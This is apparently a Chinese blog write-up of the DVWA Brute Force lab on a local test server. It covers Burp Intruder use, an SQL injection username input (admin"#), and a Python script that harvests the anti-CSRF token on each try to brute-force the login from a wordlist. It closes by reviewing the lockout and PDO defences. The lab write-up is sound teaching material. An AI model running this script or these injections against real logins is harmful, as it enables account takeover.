摘要:运行结果片段发现密码的返回长度与其他不同,获得密码,爆破成功。源码分析加入了对登录失败次数做限制,防止爆破用了更为安全的机制防御注入
BurpSuite-Intruder笔记
Burp intruder是一个强大的工具,用于自动对Web应用程序自定义的攻击。它可以用来自动执行所有类型的任务您的测试过程中可能出现的模块说明
Target 用于配置目标服务器进行攻击的详细信息
Positions 设置Payloads的插入点以及攻击类型(攻击模式)
Payloads 设置payload,配置字典
Opetions 此选项卡包含了request headers,request engine,attack results ,grep match,grep_extrack,grep payloads和redirections。你可以发动攻击之前,在主要Intruder的UI上编辑这些选项,大部分设置也可以在攻击时对已在运行的窗口进行修改
Burpsuite模块—-Intruder模块详解
Brute Force过关 Low 常规爆破使用attack type为sniper
payload positions
GET /vulnerabilities/brute/?username=admin&password=§s§&Login=Login HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login Connection: close Cookie: PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=low Upgrade-Insecure-Requests: 1
爆破结果
以length排序,发现密码为password
" . mysql_error() . "" ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "
Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed echo ""; } mysql_close(); } ?>
Username and/or password incorrect.
if( isset( $_GET[ "Login" ] ) )可以看到,服务器只是验证了参数Login是否被设置(isset函数在php中用来检测变量是否设置,该函数返回的是布尔类型的值,即true/false),没有任何的防爆破机制;
由$pass = md5( $pass );可知程序对输入的密码做了md5转换,因此不能注入攻击。但是由$user = $_GET[ "username" ];和查询语句$query = "SELECT * FROM users WHERE user = "$user" AND password = "$pass";";可知,用户输入Username:处存在SQL注入。
用户名输入admin"#得到:
Medium 常规爆破可爆破出密码,速度很慢
源码分析" . mysql_error() . "" ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "
Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed sleep( 2 ); echo ""; } mysql_close(); } ?>
Username and/or password incorrect.
sleep( 2 ); 使得爆破;速度很慢,但仍然没有防爆破机制;
对比low的源码在用户输入处加入mysql_real_escape_string函数做处理,该函数会对字符串中的特殊符号(x00,n,r,,’,”,x1a)进行转义,基本上能够抵御sql注入攻击(MySQL5.5.37以下版本如果设置编码为GBK,能够构造编码绕过mysql_real_escape_string 对单引号的转义)PHP字符编码绕过漏洞总结
high 常规爆破失败
源码分析" . mysql_error() . "" ); if( $result && mysql_num_rows( $result ) == 1 ) { // Get users details $avatar = mysql_result( $result, 0, "avatar" ); // Login successful echo "
Welcome to the password protected area {$user}
"; echo ""; } else { // Login failed sleep( rand( 0, 3 ) ); echo ""; } mysql_close(); } // Generate Anti-CSRF token generateSessionToken(); ?>
Username and/or password incorrect.
checkToken( $_REQUEST[ "user_token" ], $_SESSION[ "session_token" ], "index.php" );加入了Anti-CSRFtoken,使得burp suite爆破失效;
正常登录分析:观察登录提交的URL
http://127.0.0.1/vulnerabilities/brute/?username=admin&password=password&Login=Login&user_token=5b8ebd4aed00f92040bf08462ebb774d
发现较之前多提交了一个参数user_token,寻找user_token出处;
查看http://127.0.0.1/vulnerabilities/brute/源代码用户登录处:
Vulnerability: Brute Force
Login
Welcome to the password protected area admin
发现user_token的值;
推测登录流程:
先从提交表单处获取user_token的值,在提交表单时加入user_token参数,服务器端验证user_token的值后再验证登录是否成功。
正确爆破姿势使用Python脚本爆破(BeautifulSoup + urllib.request)
源码使用if( isset( $_GET[ "Login" ] ) )判断,未对登录失败次数做限制,因此仍然可以爆破密码;
使用BeautifulSoup库从每次请求的页面中抓取user_token的值,带入下一次get请求的user_token中。
from bs4 import BeautifulSoup import urllib.request import urllib.error header = { "Host": "127.0.0.1", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Referer": "http://127.0.0.1/vulnerabilities/brute/", "Connection": "close", "Cookie": "PHPSESSID=jabf5chqkj7mlcv86sf7l6r131; security=high" } url = "http://127.0.0.1/vulnerabilities/brute/" def get_user_token(url, header): try: req = urllib.request.Request(url, headers=header) res = urllib.request.urlopen(req) except urllib.error.URLError as e: if hasattr(e, "code"): print(e.code) if hasattr(e, "reason"): print(e.reason) except Exception as e: print(e) else: soup = BeautifulSoup(res.read(), "html.parser") user_token = soup.select("input[type="hidden"]") return user_token[0].get("value") def brute_req(next_url): # next_url = "http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}".format(password, user_token) try: req = urllib.request.Request(next_url, headers=header) res = urllib.request.urlopen(req) except urllib.error.URLError as e: if hasattr(e, "code"): print(e.code) if hasattr(e, "reason"): print(e.reason) except Exception as e: print(e) else: print(str(res.code) + " ", end="") print(len(res.read())) if __name__ == "__main__": with open("password.txt", "r") as fd: password_list = fd.read().split(" ") user_token = get_user_token(url, header) for password in password_list: next_url = "http://127.0.0.1/vulnerabilities/brute/?username=admin&password={}&Login=Login&user_token={}".format( password, user_token) print(password + ":", end="") brute_req(next_url=next_url) user_token = get_user_token(next_url, header)运行结果片段:
roots:200 5031 test:200 5031 test1:200 5031 test123:200 5031 test2:200 5031 password:200 5085 aaaAAA111:200 5031 888888:200 5031 88888888:200 5031 000000:200 5031 00000000:200 5031 111111:200 5031 11111111:200 5031 aaaaaa:200 5031 aaaaaaaa:200 5031 135246:200 5031 135246789:200 5031 123456:200 5031 654321:200 5031 12345:200 5031 54321:200 5031 123456789:200 5031 1234567890:200 5031 123qwe:200 5031发现password密码的返回长度与其他不同,获得密码,爆破成功。
Impossible 源码分析prepare( "SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // Check to see if the user has been locked out. if( ( $data->rowCount() == 1 ) && ( $row[ "failed_login" ] >= $total_failed_login ) ) { // User locked out. Note, using this method would allow for user enumeration! //echo ""; // Calculate when the user would be allowed to login again $last_login = $row[ "last_login" ]; $last_login = strtotime( $last_login ); $timeout = strtotime( "{$last_login} +{$lockout_time} minutes" ); $timenow = strtotime( "now" ); // Check to see if enough time has passed, if it hasn"t locked the account if( $timenow > $timeout ) $account_locked = true; } // Check the database (if username matches the password) $data = $db->prepare( "SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR); $data->bindParam( ":password", $pass, PDO::PARAM_STR ); $data->execute(); $row = $data->fetch(); // If its a valid login... if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) { // Get users details $avatar = $row[ "avatar" ]; $failed_login = $row[ "failed_login" ]; $last_login = $row[ "last_login" ]; // Login successful echo "
This account has been locked due to too many incorrect logins.Welcome to the password protected area {$user}
"; echo ""; // Had the account been locked out since last login? if( $failed_login >= $total_failed_login ) { echo "Warning: Someone might of been brute forcing your account.
"; echo "Number of login attempts: {$failed_login}.
"; } // Reset bad login count $data = $db->prepare( "UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR ); $data->execute(); } else { // Login failed sleep( rand( 2, 4 ) ); // Give the user some feedback echo "
Last login attempt was at: ${last_login}."; // Update bad login count $data = $db->prepare( "UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR ); $data->execute(); } // Set the last login time $data = $db->prepare( "UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;" ); $data->bindParam( ":user", $user, PDO::PARAM_STR ); $data->execute(); } // Generate Anti-CSRF token generateSessionToken(); ?>
Username and/or password incorrect.
Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.checkToken( $_REQUEST[ "user_token" ], $_SESSION[ "session_token" ], "index.php" );加入了Anti-CSRFtoken;
对登录失败次数做限制,防止爆破;
用了更为安全的PDO(PHP Data Object)机制防御sql注入
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/43973.html
摘要:一简介是用于解析命令行参数和选项的标准模块,用于代替已经过时的模块。二使用步骤爆破成功爆破失败批量爆破测试版 一、简介: argparse是python用于解析命令行参数和选项的标准模块,用于代替已经过时的optparse模块。argparse模块的作用是用于解析命令行参数,例如python parseTest.py input.txt output.txt --user=name -...
Problem For a given source string and a target string, you should output the first index(from 0) of target string in source string. If target does not exist in source, just return -1. Note 我终于找到了比较好的K...
阅读 3448·2021-09-08 10:46
阅读 1184·2019-08-30 13:17
阅读 2361·2019-08-30 13:05
阅读 1202·2019-08-29 15:29
阅读 2885·2019-08-29 11:31
阅读 535·2019-08-26 12:13
阅读 1533·2019-08-26 11:42
阅读 1822·2019-08-23 18:37
